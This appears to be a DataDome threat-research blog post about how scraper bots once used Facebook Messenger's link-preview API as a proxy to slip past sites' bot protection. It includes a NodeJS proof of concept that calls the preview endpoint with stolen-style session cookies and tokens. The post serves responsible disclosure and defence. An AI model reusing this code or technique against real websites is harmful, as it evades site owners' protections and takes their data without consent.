DataDome

How Facebook Was Used as a Proxy by Web Scraping Bots

Table of contents

The DataDome threat research team discovered in 2020 that bot operators were abusing Facebook’s link preview feature (Facebook Crawler) for web scraping purposes. In light of our more recent discovery that scraping is a gateway threat to more damaging attacks and fraudulent activity, it’s a good thing our team discovered the vulnerability and notified Facebook when we did.

When a link is shared on Facebook, Facebook crawls the shared webpage to extract information for the preview. By simulating link sharing, scraper bots were able to make unlimited requests to targeted websites via Facebook’s infrastructure. The issue was later remedied by rate limiting on the API.

The Facebook Crawler

The Facebook Crawler crawls the HTML of any page shared on Facebook or Messenger to fetch data—such as the page title, meta description, and thumbnail image—used to generate the preview. Since most website administrators want human users to see a well-curated preview whenever a link to their content is shared, they generally allow-list the Facebook Crawler’s user agent and/or IP addresses.

The Facebook crawler user agent strings are:

  • facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)

  • facebookexternalhit/1.1

The IP addresses change often, but the following command will generate an updated list of the IP addresses the Facebook Crawler uses:

How Scraper Bots Abused Facebook Infrastructure:

A preview is the result of an API call: a standard POST request to (for Messenger) https://www.messenger.com/message_share_attachment/fromURI/. Although it is the user’s browser that makes the API call to Facebook’s servers, the requests to obtain data from the target HTML page are made by a Facebook server.

Because Facebook and Messenger are important traffic sources for many websites, they are usually allow-listed. Any requests they make will be processed.

Prior to late 2020, Facebook didn’t seem to have implemented strong protective measures (such as adaptive rate limiting) on the API used for link previews. As a result, scraper bots could extract large amounts of data from the websites they were interested in, disguised as Facebook. And because the requests are made by Facebook servers, scraper developers didn’t need to devote any resources of their own to support the bots.

To hijack the preview feature, all the bot operators needed to do was provide a token linked to a Facebook account. Hidden from the targeted websites’ bot protection systems by the allow-listed Facebook infrastructure, web scrapers could make thousands of requests per minute—which is exactly what many of them did.

Proof of Concept:

In the following proof of concept, we use our own domain (datadome.co) to illustrate how Facebook’s link preview feature was being exploited for web crawling purposes.

Intended Use

To start, we posted a link to datadome.co in Messenger, which generated a call to the Messenger preview API.

datadome-in-messenger

The API call returns a response in the following form:

{
“__ar”: 1,
“payload”: {
“description”: “The #1 SaaS bot protection software for e-commerce and classifieds ads websites. Bot detection service with unmatched speed and accuracy. Deploy in minutes.”,
“media”: {
“image”: “https://external.fcdg2-1.fna.fbcdn.net/safe_image.php?w=144&h=144&url=https%3A%2F%2Fdatadome.co%2Fwp-content%2Fuploads%2Ffeatured-image.jpg&cfs=1&_nc_cb=1&_nc_hash=AQDeaYZwULAow7if”,
“image_size”: {
“height”: 144,
“width”: 144
}
},
“source”: “datadome.co”,
“style_list”: [
“share”,
“fallback”
],
“target”: null,
“title”: “DataDome – Real-Time Bot Protection, Detection and Mitigation Solution”,
“uri”: “https://datadome.co/?attachment_canonical_url=https%3A%2F%2Fdatadome.co%2F&attachment_user_url=https%3A%2F%2Fdatadome.co%2F”,
“share_data”: {
“share_type”: 100,
“share_params”: {
“urlInfo”: {
“canonical”: “https://datadome.co/”,
“final”: “https://datadome.co/”,
“user”: “https://datadome.co/”,
“log”: {
“1496675180”: “https://datadome.co/”,
“1497042740”: “https://datadome.co/”,
“1498595300”: “https://datadome.co/”
}
},
“favicon”: “https://datadome.co/wp-content/uploads/2018/07/favicon_datadome.png”,
“iframe”: [],
“title”: “DataDome – Real-Time Bot Protection, Detection and Mitigation Solution”,
“summary”: “The #1 SaaS bot protection software for e-commerce and classifieds ads websites. Bot detection service with unmatched speed and accuracy. Deploy in minutes.”,
“images_sorted_by_dom”: [],
“ranked_images”: {
“images”: [
“https://datadome.co/wp-content/uploads/featured-image.jpg”
],
“ranking_model_version”: 11,
“specified_og”: true
},
“medium”: 104,
“url”: “https://datadome.co/”,
“global_share_id”: 496414423817034,
“video”: [],
“music”: [],
“asset_3d_infos”: [],
“extra”: {
“src”: “”,
“title”: “”,
“artist”: “”,
“album”: “”,
“type”: “”
},
“amp_url”: “”,
“url_scrape_id”: “769383043882885”,
“hmac”: “Abcp_zLZhl6YJGflTqQ”,
“locale”: null,
“external_img”: “{\”src\”:\”https:\\/\\/datadome.co\\/wp-content\\/uploads\\/featured-image.jpg\”,\”width\”:1200,\”height\”:627}”
}
}
},
“hsrp”: {
“hblp”: {
“sr_revision”: 1002782683,
“consistency”: {
“rev”: 1002782683
}
}
},
“lid”: “6880779922294620033”
}

Although the response doesn’t include all webpage content, for many websites it contains important data, such as:
  • Product Name
  • Product Description
  • Price
  • Average Rating

All of which are potentially very valuable to crawlers.

Looking at the logs of the DataDome website, we could see that the IP that made the API call above was classified as coming from FACEBOOK AS. The user agent was the one the Facebook Crawler used for link previews, and the reverse DNS of the IP address also showed that it belonged to Facebook.

Malicious Use by Scraper Bots

Let’s now simulate a scraping attack using NodeJS to make requests to Facebook API endpoints.

The code below shows how it could be exploited. The file credentials.json contains the secrets (i.e. the authentication token, hidden here for obvious reasons).

When a request is made, pretending to share a link, Messenger returns a JSON document containing information about the page (here stored in the resultParsed variable).

const https = require(‘https’);
const config = require(‘./credentials.json’);

async function requestUrlFacebook(url) {
return new Promise((resolve) => {
const data = `image_height=144&image_width=144&uri=${encodeURIComponent(url)}&__a=1&__csr=&__req=1z&__beoa=0&__pc=PHASED%3Amessengerdotcom_pkg&__comet_req=0&fb_dtsg=${config.fb_dtsg}`;
const options = {
hostname: ‘www.messenger.com’,
path: ‘/message_share_attachment/fromURI/’,
method: ‘POST’,
headers: {
“accept”: “*/*”,
“authority”: “www.messenger.com”,
“origin”: “https://www.messenger.com”,
“accept-language”: “en-GB,en;q=0.9”,
“cache-control”: “no-cache”,
“content-type”: “application/x-www-form-urlencoded”,
‘Content-Length’: data.length,
“pragma”: “no-cache”,
“sec-fetch-dest”: “empty”,
“sec-fetch-mode”: “cors”,
“sec-fetch-site”: “same-origin”,
“user-agent”: “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36”,
“referrer”: `https://www.messenger.com/t/${config.accountName}`,
“cookie”: `c_user=${config.c_user}; xs=${config.xs}; wd=1201×946`
}
};

const req = https.request(options, (res) => {
let data = ”;
res.on(‘data’, (chunk) => {
data += chunk;
});

res.on(‘end’, () => {
const resultParsed = JSON.parse(data.replace(“for (;;);”, “”));
resolve(resultParsed)
});

}).on(“error”, (err) => {
console.log(“Error: “, err.message);
});

req.write(data);
req.end();
})
}

(async () => {
const content = await requestUrlFacebook(‘https://datadome.co’);
console.log(content);
// {
// __ar: 1,
// payload:
// {
// description:
// ‘The #1 SaaS bot protection software for e-commerce and classifieds ads websites. Bot detection service with unmatched speed and accuracy. Deploy in minutes.’,
// media:
// {
// image:
// ‘https://external.fcdg2-1.fna.fbcdn.net/safe_image.php?d=AQCWUlNeWLZPsTtv&w=144&h=144&url=https%3A%2F%2Fdatadome.co%2Fwp-content%2Fuploads%2Ffeatured-image.jpg&cfs=1&_nc_cb=1&_nc_hash=AQDYnd48bPKvFNkQ’,
// image_size: [Object]
// },
// source: ‘datadome.co’,
// style_list: [‘share’, ‘fallback’],
// target: null,
// title:
// ‘DataDome – Real-Time Bot Protection, Detection and Mitigation Solution’,
// uri:
// ‘https://datadome.co/?attachment_canonical_url=https%3A%2F%2Fdatadome.co%2F&attachment_user_url=https%3A%2F%2Fdatadome.co%2F’,
// share_data: { share_type: 100, share_params: [Object] }
// },
// hsrp: { hblp: { sr_revision: 1002782683, consistency: [Object] } },
// lid: ‘6880792885017226207’
// }
})()

Notably, the requester may be able to test the presence or availability of a product, which is critical information for the operators of sneaker bots and other kinds of scalper bots.

To learn more about protecting APIs from malicious bots and online fraud, read our two-part series:

Discovery, Mitigation, and Remediation

Our R&D team first discovered the abuse of Facebook’s infrastructure on the website of a long-term DataDome customerthe #1 classified ads website in its country by a wide margin. Due to the website’s popularity, it is constantly targeted by scraper bots trying to extract listing data, so it required additional protection from classified ad industry bot threats. Scraper operators had discovered the loophole in Facebook’s API that enabled them to make unlimited requests to the website.

With technical detection only, the fraudulent requests would have been indistinguishable from legitimate API calls, since they had the Facebook user agent and IP address. However, our heuristic analysis uncovered that certain parameters, unlikely to be used by humans, were overrepresented in the URLs that Facebook requested. Certain use cases were also unlikely: for example, a human user would typically share a link to a specific ad, not to a page of search results.

We found evidence of similar abuse on other customer sites. And finally, our own (responsible) tests confirmed that we could easily make more than 10,000 requests per minute to a website, using a single Facebook account. While we were able to mitigate the issue for our own customers, we concluded that there was significant potential for abuse, and we notified Facebook. Facebook has since improved rate limiting on the Messenger preview API. As our tests (and hacker forum discussions) confirmed, the improvements were able to effectively prevent continued abuse of the preview feature for scraping purposes.

To see what malicious bots and online fraud attacks are targeting your website, mobile app, and/or API in real time, check out DataDome’s free trial.

DataDome
dd product home overview

Still exploring?

Start with an on-demand demo.